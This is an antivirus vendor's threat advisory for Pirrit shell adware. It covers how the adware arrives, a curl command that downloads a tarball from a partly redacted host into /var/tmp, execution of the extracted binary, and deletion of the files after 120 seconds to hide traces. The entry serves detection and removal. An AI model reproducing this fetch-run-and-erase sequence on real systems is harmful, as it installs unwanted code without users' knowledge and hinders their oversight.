Adware.SH.Pirrit.AC
MacOS:Pirrit-DU [PUP] (AVAST)
Linux
Threat Type: Adware
Destructiveness: No
Encrypted:
In the wild: Yes
OVERVIEW
This Adware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
TECHNICAL DETAILS
326 bytes
Other
20 Dec 2023
Arrival Details
This Adware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This Adware adds the following processes:
- curl -s -L -o "/var/tmp/Pipidae.tgz" "http://{BLOCKED}.cfd/static/s3/exec6625/{BLOCKED}.tgz"
Other Details
This Adware attempts to access the following websites to download files, which are possibly malicious:
- http://{BLOCKED}.cfd/static/s3/exec6625/{BLOCKED}.tgz
It does the following:
- It extracts the downloaded file then saves it with the following filename:
- /var/tmp/Pipidae/Pipidae
It executes the downloaded file using the following commands:
- cd "/var/tmp/Pipidae/"
./Pipidae -ct cX
It deletes the following files to remove its traces in the system:
- Deleted after 120 seconds:
- /var/tmp/Pipidae
- /var/tmp/Pipidae.tgz
SOLUTION
9.800
2.687.00
21 Dec 2023
Scan your computer with your Trend Micro product to delete files detected as Adware.SH.Pirrit.AC. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:
Did this description help? Tell us how we did.